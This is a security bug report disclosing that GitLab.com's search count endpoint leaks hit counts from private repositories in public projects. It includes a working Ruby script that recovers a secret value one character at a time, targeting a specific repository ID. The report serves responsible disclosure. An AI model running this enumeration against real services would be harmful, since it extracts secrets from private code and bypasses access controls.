Search count can leak content of private repositories in public projects
Summary
Using https://gitlab.com/search/count it is possible to leak information from private repositories in public projects.
Steps to reproduce
The following script illustrates the issue by leaking character by character the GITLAB_APP_SECRET test value from the customers-gitlab-com repo which is not public (but the project is). (Note the value isn't secret, it's being defined here)
#!/usr/bin/ruby
require 'httparty'
require 'json'
COUNT ='
.wwwwwwww.
.w" "WW" "w.
." /\ /\ ".
|\ o o /|
\| ___\/___ |/
/ \ \_v__v_/ / \
/ | \________/ | \
> \ WWWW / <
\ \ "" / /
\ \ / /
'
repo_id = '2670515' # gitlab-org/customers-gitlab-com
group_id = '9970' # gitlab-org
partial_string = "GITLAB_APP_SECRET="
puts COUNT
puts
puts "~> Starting the count attack!"
puts
@chars = %W[a b c d e f 0 1 2 3 4 5 6 7 8 9] # adjust as needed
@results = {}
def find_next(url, str)
iterations = 0
@chars.each do |c|
response = HTTParty.get(url+str+c+"%22")
count = JSON.parse(response.body)
if count["count"] != "0"
follow = str + c
puts "~> Count found: #{follow}"
find_next(url,follow)
end
iterations += 1
end
end
find_next("https://gitlab.com/search/count?group_id=#{group_id}&scope=blobs&search=r%3A#{repo_id}%20%22#{CGI.escape(partial_string)}","")In the demo script we're limiting the search results with r:2670515 in the query to the customers-gitlab-com repo, 2670515 is that repo's project id.
What is the current bug behavior?
Search hit count leaks for private repos in public projects.
What is the expected correct behavior?
The search hit count should not include private repositories.
Relevant logs and/or screenshots
Output of checks
This bug happens on GitLab.com